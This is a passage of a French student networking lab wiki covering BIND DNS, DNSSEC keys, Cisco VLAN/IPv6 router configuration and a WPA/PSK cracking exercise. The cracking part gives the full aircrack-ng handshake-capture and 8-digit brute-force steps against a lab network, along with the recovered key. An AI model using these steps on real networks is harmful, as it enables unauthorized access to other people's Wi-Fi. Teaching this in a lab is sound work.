        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
